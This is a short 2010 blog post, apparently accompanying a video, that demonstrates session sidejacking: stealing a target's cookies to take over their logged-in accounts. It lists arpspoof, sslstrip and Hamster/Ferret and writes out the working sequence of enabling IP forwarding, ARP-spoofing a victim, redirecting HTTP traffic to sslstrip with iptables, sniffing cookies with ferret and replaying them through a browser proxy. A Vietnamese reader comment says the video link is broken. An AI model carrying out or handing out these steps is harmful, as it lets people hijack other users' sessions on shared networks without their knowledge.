Monday, June 7, 2010

[Video] Session Sidejacking (Ferret and Hamster)

Watch video on-line:
Download video:

What is this?
This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!

What do I need?

> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*

Name: arpspoof (DSniff)
Version: 2.3
Home Page:
Download Link:

Name: sslstrip
Version: 0.6
Home Page:
Download Link:

Name: Hamster Sidejacking Tool
Version: 2.0
Home Page:
Download Link:

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f

/pentest/sniffers/hamster/ferret -i eth0


Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually.
Konqueror -> http://hamster

1 comment:

  1. Chào anh !
    Em xin bài viết của anh, nhưng phần link video bị hỏng, mong anh fix lại ạ !